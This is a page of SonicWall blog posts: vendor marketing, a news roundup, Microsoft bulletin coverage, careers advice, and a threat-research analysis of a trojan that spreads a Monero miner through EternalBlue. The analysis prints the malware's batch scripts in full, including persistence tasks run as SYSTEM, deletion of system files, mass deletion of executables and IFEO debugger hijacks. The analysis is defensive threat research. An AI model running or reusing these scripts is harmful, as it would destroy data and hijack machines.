Protecting Your MSSP Reputation with Behavior-Based Security

/0 Comments/in /by

You’ve been here before. Your customer gets hit by a cyberattack and they ask, “Why did this happen? Shouldn’t your managed security service have protected us?”

Unless you give them a satisfactory answer, they may be shopping for a new partner. Over the past few years, I’ve heard several MSSPs having to explain to their customers that the malware or ransomware attack could not be stopped because they didn’t possess the technology that could mitigate new attacks.

Don’t put yourself in a situation where you can’t properly safeguard your customers — even against new or unknown attacks. To protect both your customers and your reputation against the latest threats, you need to deploy behavior-based security solutions that can better future-proof your customer environment.

The Logistics of Threat Prevention

When talking with people about threat prevention I ask, “How many new forms of malware do you think SonicWall detected last year?”

I usually hear answers in the thousands. The real answer? 56 million new forms or variants of malware in a single year. That’s more than 150,000 a day. Every day, security companies like SonicWall have teams of people creating signatures to help build in protections, but this takes time. Despite the industry’s best effort, static forms of threat elimination are limited.

Layering Security Across Customer Environments

MSSPs understand the importance of selling perimeter security, such as firewalls and email security, to scrub out most threats. These solutions will cover roughly 94-98 percent of threats. But for the smaller percentage of threats that are no less devastating, this is where behavior-based solutions come into play.

On each edge-facing firewall and email security service you need to have a network sandbox, which is an isolated environment where files can be tested to understand their intended purpose or motive. For example, the SonicWall Capture Advanced Threat Protection (ATP) sandbox is an isolated environment that is designed to run suspicious files in parallel through multiple engines to resist evasive malware. With the ability to block a file until a verdict has been reached, you can ensure that you will deliver highly vetted and clean traffic to end users.

Endpoints require a form of security that continuously monitor the system for malicious behavior because they roam outside the network perimeter and encounter fileless threats that come from vectors like malvertising.

SonicWall’s endpoint security solution (called Capture Client) only uses roughly 1 percent of the CPU’s processing power on a standard laptop. It can stop attacks before they happen as well as halt attacks as they execute. MSSPs love the ability to prevent dynamic attacks but also roll them back (on Windows only) in case they do initiate.

Behavior-based Security in Action

The power of behavior-based security was clear with the initial WannaCry attack in 2017. It was made famous when 16 NHS hospitals in the UK were shut down due to this viral ransomware attack. These sites were protected by a competitor whose CEO had to explain himself and apologize on national television.

The sites protected by SonicWall were up and running and helped pick up the slack when the others went down. Three weeks before the attack, SonicWall put protections in place that prevented Version 1 of WannaCry and its SMB vulnerability exploit from working.

But it was the behavior-based security controls that helped to identify and stop all the subsequent versions that came after. This same pattern emerged again with the NotPetya and SamSam ransomware attacks; static defenses followed by proactive dynamic defenses.

Furthermore, SonicWall’s reporting enables MSSPs to be alerted when something has been stopped. SonicWall Capture Client attack visualization gives administrators a view of where the threat came from and what it wanted to do on the endpoint.

This approach gives our customers — and MSSPs powered by SonicWall — the ability to protect against threats detected by SonicWall. But this strategy also protects against attacks that shift and change to bypass safeguards. By doing our best to build protections in a timely manner, as well as providing technology that detects and stops unknown attacks, we protect your customer as well as your reputation.

This story originally appeared on MSSP Alert and was republished with permission.

Trojan uses EternalBlue to install cryptominer

/in /by

Interest in cryptocurrencies has not wavered despite a period of sinking market values. Cybercriminals are still ramping up efforts to obtain Blockchain assets in the hopes that their values could spike back up again in the future. While ransomware is still around, we have observed that cryptocurrency mining is increasingly being favored by cybercriminals as a method of choice in obtaining these cryptocurrencies. The premise is fairly simple- a machine gets infected by malware which stealthily uses its processing power to mine cryptocurrencies.

This week, the SonicWall Capture Labs Threat Research team has come across another Trojan that uses the leaked NSA exploit, EternalBlue, to install a cryptominer. This cryptominer even kills other known cryptomining processes that might be running on the victim’s machine to ensure exclusivity of the mining resource.

Infection Cycle:

The main installer uses the following icon pretending to be a Chinese Security product from 360.cn.

Upon execution, it creates a directory named “IIS” within the %Windir% folder and drops several files including a suite of the NSA exploit based hack tools:

  • %Windir%\IIS\CPUInfo.exe
  • %Windir%\IIS\Doublepulsar-1.3.1.exe
  • %Windir%\IIS\Esteemaudit-2.1.0.exe
  • %Windir%\IIS\Esteemaudittouch-2.1.0.exe
  • %Windir%\IIS\Eternalblue-2.2.0.exe
  • %Windir%\IIS\Eternalchampion-2.0.0.exe
  • %Windir%\IIS\free.bat
  • %Windir%\IIS\demo.bat
  • %Windir%\IIS\demc.bat
  • %Windir%\IIS\x86.dll
  • %Windir%\IIS\x64.dll

CPUInfo.exe uses the following icon. This file is used to determine if the machine is vulnerable and use the appropriate hacktool to then install either x86.dll or x64.dll depending on the type of processor of the file system.

To ensure persistence, Demo.bat is executed to add scheduled tasks on the Task Scheduler adding CPUInfo.exe as a scheduled task named “GooglePinginConfigs.


sc config Schedule start= auto
sc start Schedule
schtasks /delete /tn RavTask /f
schtasks /delete /tn GooglePinginConfigs /f
@schtasks /create /sc minute /mo 240 /tn "RavTask" /tr "C:\windows\IIS\free.bat" /ru "system" /f
@schtasks /create /tn "GooglePinginConfigs" /tr "C:\windows\IIS\CPUInfo.exe" /sc onstart /ru "system" /f
@C:\Windows\System32\attrib +s +h C:\WINDOWS\Tasks\RavTask.job
@C:\Windows\System32\attrib +s +h C:\WINDOWS\Tasks\GooglePinginConfigs.job
schtasks /run /tn "RavTask"
del %0

Demc.bat is then executed which terminates known (possibly rival) cryptominers and performs a slew of other malicious procedures as a way of taking over the machine which includes the following:

  • Denying access to ftp.exe using access controls and taking ownership of it
  • Deleting the hosts file
  • Clearing the DNS cache
  • Stop and deleting services
  • Deleting all EXE files in the %ProgramFiles% directory

@wmic process where "name='server.exe' and ExecutablePath='C:\\program files (x86)\\stormii\\server.exe'" call Terminate
@md "C:\program files (x86)\stormii\server.exe"
echo y|cacls "C:\program files (x86)\stormii\server.exe" /d everyone
attrib +s +h +r +a "C:\program files (x86)\stormii"
echo y|cacls "C:\program files (x86)\stormii" /d everyone
@wmic process where "name='conhost.exe' and ExecutablePath='C:\\program files (x86)\\windows nt\\conhost.exe'" call Terminate
@del /s /q "C:\program files (x86)\windows nt\conhost.exe"
@sc delete SuperProServerST
taskkill /f /t /im ftp.exe
takeown /f %SystemRoot%\SysWOW64\ftp.exe /a
takeown /f %SystemRoot%\System32\ftp.exe /a
echo y|cacls %SystemRoot%\System32\ftp.exe /g users:f
echo y|cacls %SystemRoot%\SysWOW64\ftp.exe /g users:f
del %SystemRoot%\System32\ftp.exe
del %SystemRoot%\SysWOW64\ftp.exe
md %SystemRoot%\SysWOW64\ftp.exe
attrib +s +h +r %SystemRoot%\SysWOW64\ftp.exe
attrib +s +h +r %SystemRoot%\System32\ftp.exe
echo y|cacls %SystemRoot%\SysWOW64\ftp.exe /d everyone
echo y|cacls %SystemRoot%\System32\ftp.exe /d everyone
takeown /f %systemroot%\system32\Drivers\etc\hosts /a
echo y|cacls %systemroot%\system32\Drivers\etc\hosts /g users:f
attrib -s -h -a -r %systemroot%\system32\Drivers\etc\hosts
del /s /q %systemroot%\system32\drivers\etc\hosts
echo 127.0.0.1 localhost>>%systemroot%\system32\drivers\etc\hosts
attrib +s +h +a +r %systemroot%\system32\Drivers\etc\hosts
@ipconfig /flushdns
@attrib -h -r -s -a C:\ProgramData
taskkill /f /t /im CPUInfo.exe
taskkill /f /t /im up.exe
taskkill /f /t /im block.exe
taskkill /f /t /im cpu.exe
@taskkill /f /t /im svshostr.exe
@sc stop xtfya
@sc delete xtfya
@sc stop "Network Support"
@sc delete "Network Support"
@sc stop "HomeGroup Support"
@sc delete "HomeGroup Support"
@sc stop xtfy
@sc delete xtfy
@sc stop Natioanl
@sc delete Natioanl
@sc stop Natihial
@sc delete Natihial
@sc stop "Interactive Services Detection Report"
@sc delete "Interactive Services Detection Report"
@sc stop "mssecsvc2.0"
@sc delete "mssecsvc2.0"
@sc stop "mssecsvc2.1"
@sc delete "mssecsvc2.1"
@sc stop ServiceMais
@sc delete ServiceMais
@sc stop ServiceMaims
@sc delete ServiceMaims
del /f /s /q %ProgramData%\*.exe
rd /s /q %ProgramData%\dll
md %ProgramData%\dll
attrib +s +h +r %ProgramData%\dll
echo y|cacls %ProgramData%\dll /d everyone
del /f /s /q C:\Progra~1\dll
md C:\Progra~1\dll
attrib +s +h +r C:\Progra~1\dll
echo y|cacls C:\Progra~1\dll /d everyone
md c:\wax.exe
attrib +s +h +r c:\wax.exe
echo y|cacls c:\wax.exe /d everyone
@echo y|cacls C:\ProgramData\Natihial\svshostr.exe /d everyone
@echo y|cacls C:\ProgramData\Microsoft\Natihial\cmd.exe /d everyone
echo y|cacls C:\ProgramData\expl0rer.exe /d everyone
@echo y|cacls C:\windows\svchost.exe /d everyone
@Wmic Process Where "Name='cmd.exe' And ExecutablePath='C:\\ProgramData\\Microsoft\\Natihial\\cmd.exe'" Call Terminate
@schtasks /delete /tn "Adobe Flash Player Updaters" /f
@wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate
@wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\dll\\svchost.exe'" call Terminate
@wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\dll\\csrss.exe'" call Terminate
@wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\Natioanl\\svchostr.exe'" call Terminate
@wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\Natioanl\\csrss..exe'" call Terminate
@wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\nm\\winlogin.exe'" call Terminate
md %SystemRoot%\svchost.exe
attrib +s +h +r %SystemRoot%\svchost.exe
echo y|cacls %SystemRoot%\svchost.exe /d everyone
taskkill /f /t /im tasksche.exe
md %SystemRoot%\tasksche.exe
attrib +s +h +r %SystemRoot%\tasksche.exe
echo y|cacls %SystemRoot%\tasksche.exe /d everyone
taskkill /f /t /im srvany.exe
md %SystemRoot%\srvany.exe
attrib +s +h +r %SystemRoot%\srvany.exe
echo y|cacls %SystemRoot%\srvany.exe /d everyone
taskkill /f /t /im WUDHostServices.exe
md %SystemRoot%\System32\WUDHostServices.exe
attrib +s +h +r %SystemRoot%\System32\WUDHostServices.exe
echo y|cacls %SystemRoot%\System32\WUDHostServices.exe /d everyone
@taskkill /f /im wbmoney.exe
@taskkill /f /im GGtbviewer.exe
taskkill /f /t /im Netohad.pif
taskkill /f /t /im Qrhkveb.com
taskkill /f /t /im Tnntknl.com
taskkill /f /t /im Snwhtdw.bat
taskkill /f /t /im dllhsot.exe
taskkill /f /t /im Tasksvr.exe
taskkill /f /t /im serices.exe
taskkill /f /t /im seever.exe
taskkill /f /t /im mssecsvc.exe
taskkill /f /t /im svchsot.exe
taskkill /f /t /im lsacs.exe
taskkill /f /t /im nsa.exe
taskkill /f /t /im csrs.exe
taskkill /f /im WerFault.exe
taskkill /f /im WScript.exe
taskkill /f /t /im NV-NO.exe
taskkill /f /t /im NV.exe
taskkill /f /t /im Eternalblue-2.2.0.exe
taskkill /f /t /im Eternalchampion-2.0.0.exe
taskkill /f /t /im Doublepulsar-1.3.1.exe
@wmic process where "name='explorer.exe' and ExecutablePath='C:\\Windows\\system\\explorer.exe'" call Terminate
@wmic process where "name='explorer.exe' and ExecutablePath='C:\\Windows\\Fonts\\explorer.exe'" call Terminate
@wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\Fonts\\conhost.exe'" call Terminate
@reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smss.exe" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundllhost.exe" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wax.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Systmss.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ystmss.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wuauc1t.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\2.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nanol.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchostr.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss..exe" /v "debugger" /d taskkill.exe /f
@del /q C:\Windows\system\explorer.exe
@del /q C:\Windows\Fonts\explorer.exe
@taskkill /f /t /im lservice.exe
@taskkill /f /t /im ystmss.exe
@taskkill /f /t /im wuauc1t.exe
del %0

Free.bat is then executed as a final cleanup of the install process.


@ECHO OFF
ping -n 2 127.0.0.1>nul
taskkill /f /t /im NV-NO.exe
taskkill /f /t /im NV.exe
taskkill /f /t /im Eternalblue-2.2.0.exe
taskkill /f /t /im Eternalchampion-2.0.0.exe
taskkill /f /t /im Doublepulsar-1.3.1.exe
taskkill /f /im mysqld.exe
taskkill /f /im CPUInfo.exe
taskkill /f /im jvav.exe
ping -n 5 127.0.0.1>nul
schtasks /run /tn "GooglePinginConfigs"
exit

The loaded x64.dll and x86.dll are then responsible for downloading two more component files which are the Install.exe and mado.exe. Install.exe just reinstalls CPUInfo.exe and whole cycle of CPUInfo.exe execution just restarts and persistence is warranted.

Mado.exe goes to bmw.hobuff.info and downloads another file which is the main cryptominer file. This cryptominer disguises itself as another 360.cn component and uses the same icon as the main installer above. Upon careful examination we find that this mines Monero cryptocurrency and is based off the open-sourced XMRig CPU miner.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Downloader.AL_5 (Trojan)
  • GAV: Reconyc.DDA_5 (Trojan)
  • GAV: Madominer.D (Trojan)
  • GAV: Madominer.D_2 (Trojan)
  • GAV: Equation.A (Trojan)
  • GAV: XMRig.XMR_3 (Trojan)

Cyber Security News & Trends – 10-12-18

/0 Comments/in /by

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.

SonicWall Spotlight

“A leader has to be passionate about their work be able to motivate their teams to be equally passionate” With Bill Conner – Authority Magazine

  • Bill Conner, CEO of SonicWall, is interviewed about his career, from his days loading shipping containers all the way to his current role.

Cryptomining Malware Steals Fortnite Gamers’ Bitcoins and Personal Data – SC Magazine (UK)

  • As malware continues to target Fortnite players, SonicWall’s Lawrence Pingree talks about the probable future of kinetic ransomware.

Chart of the Day: Google Plus Never Got off the Ground – Real Money

  • SonicWall CEO Bill Conner weighs in with his thoughts on the importance, or not, of the Google Plus breach.

Cyber Security News

Pentagon Struggling to Meet Cyber Challenges, as Modern Warfare Goes High Tech – The Washington Times

  • The Pentagon wants to avoid another “Beast of Kandahar” situation but is struggling to keep its cybersecurity stronger than its attackers.

New Evidence of Hacked Supermicro Hardware Found in U.S. Telecom – Bloomberg

  • Accusations that China are inserting spying chips into US companies’ hardware are still being made and are spreading to other companies.

Medtronic Disables Pacemaker Programmer Updates Over Hack Concern – Reuters

  • There have been no documented reports of the vulnerability being exploited but the company are taking no chances with peoples’ hearts.

Vietnam Cyber Law Set for Tough Enforcement Despite Google, Facebook Pleas – Reuters

  • Companies will be required to store a wide range of user data and set up offices inside the country.

Heathrow Airport Fined £120,000 Over USB Data Breach Debacle – ZDNet

  • A memory stick with unencrypted private data of airport employees was found by a member of public last year.

Payment-Card-Skimming Magecart Strikes Again: Zero out of Five for Infecting E-Retail Sites – The Register (UK)

  • The British Airways and Ticketmaster attacking toolkit Magecart isn’t going away, this time turning up in a plugin called Shopper Approved that is used by hundreds of e-commerce sites.

This Cryptojacking Mining Malware Pretends to Be a Flash Update – ZDNet

  • The much-maligned Flash software now has the added problem of an imposter program that uses a victim’s computer to mine for the Monero cryptocurrency.

In Case You Missed It

12 Smart Reasons to Upgrade to SonicWall Secure Mobile Access (SMA)

/0 Comments/in /by

The modern mobile or remote workforce is one businesses’ most valuable resources. Ensuring users have fast and secure anytime, anywhere access to applications, services and networks is a business-critical function.

For many years, the SonicWall Secure Remote Access (SRA) solution was the workhorse for distributed or remote personnel across the world. But technology moves fast. Today’s business environment has more users, applications and services than ever before. Satisfying this need requires a secure, high-performance remote access solution.

That’s why SonicWall introduced Secure Mobile Access (SMA), a unified secure access gateway that enables organization to provide anytime, anywhere and any device access to any application. More memory. More users. More throughput.

The solution’s granular access control policy engine, context-aware device authorization, application-level VPN and advanced authentication with single sign-on enables organizations to move to the cloud with ease, and embrace BYOD and mobility in a hybrid IT environment.

Explore the top 12 reasons organizations are upgrading to SonicWall SMA to deliver the speed, security and user experiences their mobile workforces require.

Shrink Budgets by Going Virtual

Virtualizing your infrastructure provides many benefits, while significantly improving performance needed for today’s secure mobility. Improvements include enhanced scalability and flexibility, reduction in downtime, minimized upfront investment and lower maintenance costs.

Why upgrade: SMA 8200v is a powerful virtual appliance with a quad-core processor and 8 Gb RAM. It delivers high-performance secure remote access — all at a fraction of the cost of a physical appliance.

Go Faster

Having both more and faster processing cores enables SMA to encrypt data-in-motion and with lower latency. The end result is a faster, high-performance experience for end users.

Why upgrade: The SMA series has quad core processors that run at up to 1.8 times the speed of those on the SRA series (single core on EX6000 and dual core on EX7000).

Increase Your Throughput

While speed is important, the ultimate goal is to deliver a seamless user experience. By increasing throughput, you promote better productivity with fast and secure access to mission-critical cloud and on-premises applications.

Why upgrade: SMA appliances have up to 15 times the SSL-VPN throughput of the SRA EX series (1.58 Gbps/400 Mbps/3.75 Gbps vs. 106 Mbps/550Mbps).

Serve More Concurrent Users

The mobile workforce has matured quickly in the past decade. Businesses are serving more remote users than ever before — and usually at the same time. Having a higher number of concurrent user sessions provides greater scalability by enabling more simultaneous user sessions to be active and tracked by firewalls.

Why upgrade: The SMA series offer more scalability from a single appliance for larger numbers of concurrent user sessions compared to the SRA series.

Get More High-Speed Ports

Today’s applications and cloud services are bandwidth hogs. Whether users are accessing sales data from a SaaS application or streaming a video presentation, organizations need the throughout to support bandwidth-intensive applications and high-speed data transfers.

Why upgrade: SMA 8200v supports 2 10-GbE ports and SMA 7200 includes 2 10-GbE ports out-of-the box.

Keep Features, Firmware Current

One of the most important best practices to defend against cyberattack or unknown threats is to always keep patches current. This habit also ensures you’re getting the latest feature updates to take advantage of new capabilities that help reduce costs while embracing trends such as BYOD, mobility and cloud.

Why upgrade: Every SMA firmware version is packed with new features. For example, SMA OS 12.1 is the current recommended firmware that provides advanced features, such as:

  • Federated Single Sign-On (SSO)
  • Face ID AUTH Support
  • Centralized Access Portal for Hybrid IT
  • File-Scanning via SonicWall Capture ATP Sandbox Service

Retain Support, Warrant for Hardware

Delivering secure remote access is a critical IT function that reduces attack surface for cybercriminals. It is imperative that the solution is always fully supported and has a best-in-class warranty — should the need arise.

Why upgrade: The SRA series are approaching End of Life (EOL) and the appliances will not be supported beyond November 2019.

Centralize Management & Reporting

Management and technology oversight are significant cost centers for businesses. By centralizing management and reporting, and automating routine tasks, organizations can drastically reduce administrative overhead. That’s time better spent on core business or security objectives.

Why upgrade: SonicWall Central Management Server (CMS) provides organizations with a single administrative user interface for reporting and management of all SMA appliances. This even includes SSL certificate management and policy roll-outs.

Enhance Resilience & Availability

Downtime happens. But organizations do their best to ensure business continuity and scalability, not to mention service-level agreements are being met. Service providers vastly improve Quality of Service (QoS) and workforce productivity by being in proactive in this area.

Why upgrade: Appliances managed by CMS can be configured as Active/Active or Active/Standby high-availability (HA) clusters for redundancy, availability and reliability. The solution includes Global Traffic Optimizer (GTO) for intelligent load-balancing and universal session persistence in case of failovers.

Store Critical Information with Onboard Memory

While much storage today is outsourced to clouds or servers, having large onboard modules is still a key capability. It allows for the local storage of logs, reports, file transfer inspection, firmware backups and restores, and more.

Why upgrade: The SMA 6200 and 7200 offer storage modules that have 12.5 times the capacity of the SRA series (2 x 500 GB vs. 80 GB).

Reduce Costs by Maximizing Global Usage

Organizations with appliances that are globally distributed can benefit from the fluctuating demands for user licenses due to time differences from off‐work/night hours.

Why upgrade: User licenses no longer need to be applied to individual SMA appliances. With central user licensing, CMS reallocates licenses to managed SMA appliances based on usage.

About SonicWall SMA

SMA is an advanced access security gateway that offers secure access to network and cloud resources from any device. SMA provides centralized, granular, policy-based enforcement of remote and mobile access to any corporate resource delivered using a hardened Linux-based appliance. Available as hardened physical appliances or powerful virtual appliances, SMA fits seamlessly into any existing IT infrastructure.

Microsoft Security Bulletin Coverage for October 2018

/in /by

SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of October 2018. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2010-3190 MFC Insecure Library Loading Vulnerability
There are no known exploits in the wild.
CVE-2018-8265 Microsoft Exchange Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8320 Windows DNS Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8329 Linux On Windows Elevation Of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8330 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8333 Microsoft Filter Manager Elevation Of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8411 NTFS Elevation of Privilege Vulnerability
ASPY 5282 : Malformed-File exe.MP.38
CVE-2018-8413 Windows Theme API Remote Code Execution Vulnerability
ASPY 5283 : Malformed-File theme.MP
CVE-2018-8423 Microsoft JET Database Engine Remote Code Execution Vulnerability
ASPY 5271 : Malformed-File mdb.TL.4
ASPY 5272 : Malformed-File mdb.TL.5
CVE-2018-8427 Microsoft Graphics Components Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8432 Microsoft Graphics Components Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8448 Microsoft Exchange Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8453 Win32k Elevation of Privilege Vulnerability
ASPY 5284 : Malformed-File exe.MP.39
CVE-2018-8460 Internet Explorer Memory Corruption Vulnerability
IPS 13639 : Internet Explorer Memory Corruption Vulnerability (OCT 18) 1
CVE-2018-8472 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8473 Microsoft Edge Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8480 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8481 Windows Media Player Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8482 Windows Media Player Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8484 DirectX Graphics Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8486 DirectX Information Disclosure Vulnerability
IPS 5285 : Malformed-File exe.MP.40
CVE-2018-8488 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8489 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8490 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8491 Internet Explorer Memory Corruption Vulnerability
IPS 13640 : Internet Explorer Memory Corruption Vulnerability (OCT 18) 2
CVE-2018-8492 Device Guard Code Integrity Policy Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8493 Windows TCP/IP Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8494 MS XML Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8495 Windows Shell Remote Code Execution Vulnerability
IPS 13637 : Windows Shell Remote Code Execution Vulnerability (OCT 18) 1
CVE-2018-8497 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8498 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8500 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8501 Microsoft PowerPoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8502 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8503 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8504 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8505 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13636 : Chakra Scripting Engine Memory Corruption Vulnerability (OCT 18) 1
CVE-2018-8506 Microsoft Windows Codecs Library Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8509 Microsoft Edge Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8510 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8511 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8512 Microsoft Edge Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8513 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8518 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8527 SQL Server Management Studio Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8530 Microsoft Edge Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8531 Azure IoT Device Client SDK Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8532 SQL Server Management Studio Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8533 SQL Server Management Studio Information Disclosure Vulnerability
There are no known exploits in the wild.

How to Stop Malware-Created Backdoors

/0 Comments/in /by

Hackers have been placing backdoors into systems for years for a variety of purposes. We have all read the stories about backdoors being installed in retailers to siphon payment card information; a PSI DSS and reputation nightmare.

Backdoors also have been deployed in government and higher education institutions to gather intellectual property, such and defense and trade secrets. Medical institutions pay out settlements due to HIPAA violations caused by these forms of malware every year.

A perfect example of a backdoor-creating malware is Calisto. This backdoor trojan is designed for macOS (many executives use Macs) and attempts to install itself in different folders until it finds a home and then enable accessibility authorization.

If this can be accomplished, it will open a backdoor to the hacker to control the entire system. In most cases, this malware fails (due to protections placed on new Macs) but can leave behind system vulnerabilities.

So, how do you stop such an aggressive form of malware? It’s important to know that not all trojans are alike.

Some will create a customized payload every time it lands on a new system to avoid future attacks being blocked by signatures. SonicWall stops known backdoors on our next-generation firewalls (NGFW) and can test and find new versions of backdoor malware with the Capture Advanced Threat Protection (ATP) sandbox service.

But for threats that land on the endpoint, the key is using advanced artificial intelligence (AI) that can detect the malware’s presence on the endpoint. Does it try to bypass antivirus? Does it embed itself in a directory it shouldn’t? Does it attempt to download something from a command and control (C&C) server? These are just some of the ways Calisto can be identified.

To properly stop Calisto and other backdoor-building malware, download the exclusive tech brief: Protecting macOS Endpoints from Calisto. The brief will explore:

  • Origin of Calisto
  • Why SIP enablement is not enough
  • How the malware delivers its payload
  • Secondary steps the malware will take to ensure execution
  • Proven solutions for stopping Calisto

 

Tips for Getting a Job in Cybersecurity

/0 Comments/in /by

It’s been a much-publicized issue for years: the cybersecurity skills gap. Not enough talented security pros. Way too many critical cybersecurity jobs. It’s becoming such a challenge, it’s even part of the U.S. government’s new Nation Cyber Strategy.

“The Administration will work with the Congress to promote and reinvigorate educational and training opportunities to develop a robust cybersecurity workforce,” noted in the official strategy document. “This includes expanding Federal recruitment, training, re-skilling people from a broad range of backgrounds, and giving them opportunities to re-train into cybersecurity careers.”

The perplexing fact of this challenge is that it’s not always clear how to get a job in the cybersecurity field. Want to become an electrician? Go to trade school. Want to become a doctor? Attend medical school. A lawyer? Study hard and pass the bar exam.

But pursuing a future in cybersecurity isn’t always as straightforward, particularly for those new to the field. There are many paths to take, but it’s often fraught with complexity and uncertainty.

A Critical Problem: Not Enough Cybersecurity Talent

As of March 2018, there were more than 300,000 unfilled cybersecurity jobs in the U.S. alone. California, Texas and Virginia represented the top geographies for open cybersecurity roles.

This skills gap is predicted to widen to 3.5 million jobs by 2021, a major supply-and-demand challenge for the one of the most critical threat landscapes. The growing disparity opens the door for all types of job-seekers: entry-level candidates, seasoned professionals, career-changers and executives alike.

“The demand for cybersecurity professionals is accelerating at such a pace that we can’t hire qualified and experienced talent fast enough,” said SonicWall Global Human Resources Director Bryce Ashcraft. “These are exciting, highly rewarding career fields, so it represents amazing opportunity for individuals interested in computer science, information technology, threat analysis and forensics — the list goes on and on.”

The Call for More Women in Cybersecurity

One of the many reasons for the cybersecurity skills gap is the gender disproportion in the industry. Data from the last few years estimated that women comprised 11 percent of the cyber workforce. One new source states that women represent 20 percent of the field — a stark improvement. But more change is still needed.

This issue was never more apparent than at RSA, North America’s largest cybersecurity conference hosted annually in San Francisco. Organizers of RSA 2018 actually came under fire for the lack of female panelists and speakers for the event, a story which was documented by SonicWall in, “The Shortest Line at RSA Conference 2018: Where are all the Women?”

Fortunately, pro-women organizations are growing quickly. Events, conferences and scholarships have been created across the world to empower women to prepare for careers in cybersecurity.

Organizations Conferences & Events
